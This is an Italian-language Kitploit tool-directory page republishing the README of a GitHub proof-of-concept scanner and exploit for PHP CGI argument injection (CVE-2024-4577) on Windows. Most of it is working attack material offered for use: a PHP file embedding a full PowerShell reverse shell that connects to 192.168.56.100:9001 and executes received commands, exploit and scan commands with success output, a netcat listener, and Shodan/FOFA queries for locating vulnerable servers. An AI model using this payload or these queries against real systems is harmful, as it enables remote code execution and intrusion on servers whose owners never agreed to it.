Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/l0n3m4n/cve-2024-4577-rce
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubl0n3m4n/cve-2024-4577-rce

CVE-2024-4577-RCE

PoC - Iniezione di argomenti PHP CGI CVE-2024-4577 (Scanner ed Exploit)

Vedi Repository
712 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PHP CGI Argument Injection (CVE-2024-4577) RCE

Facebook X Medium Python Kali

📜 Descrizione

Nelle versioni di PHP 8.1.* precedenti alla 8.1.29, 8.2.* precedenti alla 8.2.20, 8.3.* precedenti alla 8.3.8, quando si utilizza Apache e PHP-CGI su Windows, se il sistema è configurato per utilizzare determinati code page, Windows può adottare un comportamento "Best-Fit" per sostituire i caratteri nella riga di comando passata alle funzioni dell'API Win32. Il modulo PHP CGI potrebbe interpretare erroneamente questi caratteri come opzioni PHP, consentendo a un utente malintenzionato di passare opzioni al binario PHP in esecuzione e quindi rivelare il codice sorgente degli script, eseguire codice PHP arbitrario sul server, ecc.

"XAMPP è vulnerabile con una configurazione predefinita e possiamo prendere di mira l'endpoint /php-cgi/php-cgi.exe. Per prendere di mira un endpoint .php esplicito (ad es. /index.php), il server deve essere configurato per eseguire gli script PHP in modalità CGI."

📚 Indice

  • 📜 Descrizione
  • 🛠️ Installazione
  • ⚙️ Utilizzo
  • 💁 Riferimenti

🛠️ Installazione

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 

⚙️ Utilizzo

php-cge

🤖 Stabilire una reverse shell

Payload PHP

[!NOTE] Questo strumento dimostra attacchi e tecniche (TTP) realistici. Tuttavia, questo specifico payload di esempio non funziona in questo scenario. Modifica shell.php per ottenere un payload pienamente funzionante.

root@kitploit:~
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 

🖥️ Scansione del server

root@kitploit:~
$ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                      
    
[+] Target https://target.com is vulnerable to CVE-2024-4577

🎯 Sfruttamento del server vulnerabile

root@kitploit:~
$ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner  

[+] Exploit successful!

👨🏻‍💻 Listener con Netcat

root@kitploit:~
$ nc -lvnp 9001

🔍 Scoperta di host vulnerabili

  • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
  • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

💁 Riferimenti

  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
  • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
  • http://www.openwall.com/lists/oss-security/2024/06/07/1
  • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
  • https://www.php.net/ChangeLog-8.php#8.1.29
  • https://www.php.net/ChangeLog-8.php#8.2.20
  • https://www.php.net/ChangeLog-8.php#8.3.8

⚠️ Esclusione di responsabilità

Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per un uso improprio o per eventuali danni causati dallo strumento. apri una segnalazione

Scarica lo strumento